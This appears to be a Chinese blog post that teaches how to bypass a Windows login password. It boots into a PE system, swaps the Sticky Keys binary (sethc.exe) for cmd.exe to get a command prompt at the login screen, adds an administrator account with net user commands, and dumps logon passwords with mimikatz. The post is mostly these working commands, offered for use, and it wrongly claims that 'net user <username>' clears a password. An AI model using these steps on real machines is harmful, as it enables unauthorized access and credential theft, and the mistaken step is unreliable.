网上有流传过强制关机进安全模式用命令行改密码,明明就算进入安全模式也是需要输入密码的,也不知道为啥在却在百度上这么横行!
第一种方法:大家一定用过老毛桃等傻瓜式U盘启动重装软件|没用过也没关系,官网的教程一看就懂《http://www.laomaotao.org/jiaocheng/92/upqdzz.html》,傻瓜式的嘛),最最简的办法就是通过重装软件的密码绕过功能!
如果只是想取出硬盘里的文件,直接进入PE系统即可对硬盘文件包括C盘的文件进行操作!当然进PE也就可以自行重装系统啦!
如果还想要进入正常的系统?那也没问题!
进入PE系统后,先在C:\Windows\System32目录下找到cmd.exe
将其复制出来,重命名为sethc.exe后再粘贴回C:\Windows\System32目录下替换原sethc.exe文件
原理比较简单,就是将粘滞键|sethc)替换为命令提示符(cmd),然而windos即使在没有键入密码的开机欢迎页面也可以通过连击五次shift开启粘滞键,由于原来的粘滞键被命令提示符替换掉了,所以么替换完毕后重启系统,在开机欢迎界面连按五次shift就会出现cmd命令符。
到了这一步,懂cmd命令的就知道该干嘛了吧!
清除现有的用户密码
输入net user 用户名 就没有密码了比如你想创建一个新用户 名为:123 密码为:456
net user 123 456 /add
当然也可以不设置密码,不设置密码只要不打上密码就可以了,如:
net user 123 /add
然后就加入管理员组了:
net localgroup administrators 用户名 /add重启就有多个用户可选登陆啦!
如果想知道原有用户的密码是什么,使用提权神器——mimikatz,哦不,应该是Windows密码抓取神器——mimikatz
通过简单的两个命令就可以知道用户的密码是多少
第一步:privilege::debug
//提升权限
第二步:sekurlsa::logonpasswords
//抓取密码
技术没有对错,错的不是技术,希望大家用在正确的地方!